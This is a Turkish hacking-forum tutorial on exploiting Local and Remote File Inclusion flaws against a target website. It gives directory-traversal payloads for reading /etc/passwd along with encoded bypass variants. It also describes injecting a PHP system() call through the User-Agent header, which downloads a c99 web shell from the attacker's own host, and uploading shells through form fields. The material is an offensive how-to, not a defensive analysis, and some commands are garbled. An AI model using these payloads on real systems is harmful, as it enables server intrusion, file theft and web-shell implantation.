Lfı ve Rfı açığı

SeapHacker

Uzman üye
3 Nis 2016
1,180
2
Bileceksiniz
Web Güvenlik Açıkları 1 (LFİ-RFİ)
Amaç
- LFİ ve RFİ (Local File İnclude) açıklarını öğrenmek
Önsöz
- Arkadaşlar bu konumuzda LFİ ve RFİ açıklarının nasıl kullanılacağını sizlere anlatacağım. Konumuza
ilk önce LFİ açığıyla başlayacağız sonra RFİ açığıyla devam edeceğiz.
LFİ nedir ?
- LFİ hedef sitenin serverındaki dosyaları okumaktır
LFİ açığı nasıl bulunur ?
- Manuel Olarak
- Web Vulnerability Scanner Programlarıyla (Vega,Acunetix vs.)
LFİ açığı bulma ?
- 1) Mesela ; http://www.hedefsite.com/index.php?id=9 burası sadece id değil (cat,c,home vs.) gibi de
olabilir URL’sindeki id değerini yani 9 silelim eğer şöyle bir hata ile karşılaşırsak demek ki LFİ açığı
vardır.
Hata: Warning: include(company_data/.php) [function.include]: failed to open stream: No such file or
directory in /usr/home/posting/public_html/resources/index.php on line 171
Saldırı
- Yukardaki bize verdiği hataya baktık önemli olan kısım
/usr/home/posting/public_html/resources/index.php buradır. Şimdi bakıyoruz.
1-) /usr
2-)/home
3-)/posting
4-)/public_html
5-)/resources
6-)/index.php
- Şimdi anlıyoruzki 6 adet ../ koyacağız. Yani ;
URL’ deki id değerinden sonrasını silip yerine ../../../../../../etc/passwd koyacağız.
Yani;http://www.hedefsite.com/index.php?id=../../../../../../etc/passwd şeklinde.
- Peki LFİ bulunduğu halde dosya okunmazsa ne yapmamız gerekir. Tabiki Bypass.
Bypass
1- HTML Encode
Normal: ../../../../../../etc/passwd
Bypass: ..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd Yani;
http://www.hedefsite.com/index.php?id=../../../../../../etc/passwd
2- Charcode
- Charcode de her karakterin bir sayı karşılığı vardır. Normal de tek tek yazarız ama mozillanın hacbar
eklentisinde bulunan bir program.
Normal: ../../../../../../etc/passwd
Bypass:
String.fromCharCode(46,46,47,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47,101,116,99,47,112,97,
115,115,119,100)
3- Diğer
Normal: ../../../../../../etc/passwd
Bypass: ../../../../../../etc/passwd&… invalid../../../../../../../../../../../../../../../etc/passwd&…
Saldırı
- Saldırıyı mozillanın tamper data eklentisi ile yapacağız. Tamper Datayı Açalım. Ve starta
tıklayalım.http://www.hedefsite.com/index.php?id=../../../../../../etc/passwd şeklinde sayfasını yenileyin.
Sonra tamper
data bir uyarı verecek Tamper Datadaki User-Agent bölümünü silin ve şunu yazın: <?
system(“cathttp://www.sizinsiteadresiniz.com/c99.txt? -O c99.php “); ?> Şeklinde Shell’i yükleyin ama txt
şeklinde. Sonra
http://www.hedefsite.com/c99.php adresinde Shell’inizi açabilirsiniz. LFİ açığı bu kadar.


RFİ nedir ?
- RFİ (Remote File İnclude) demek hedef siteye dosya yüklemektir.
RFİ nasıl bulunur ?
- Manuel Olarak
- Web Vulnerability Scanner Programlarıyla (Vega,Acunetix vs.)
RFİ nerelerde bulunur ?
1- Arama Kutularında
2- Kayıt Formlarında
3- Yorum Formlarında
Saldırı
- Arama motorunda , kayıt formlarında , yorum formlarında eğer RFİ açığı varsa şöyle yapıyoruz.
http://www.sizinsiteadresiniz.com/c99.txt? şeklinde txt olarak Shell’i upload ederiz. Shell otomatik olarak
açılır ya da çağırmamız gerekir.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.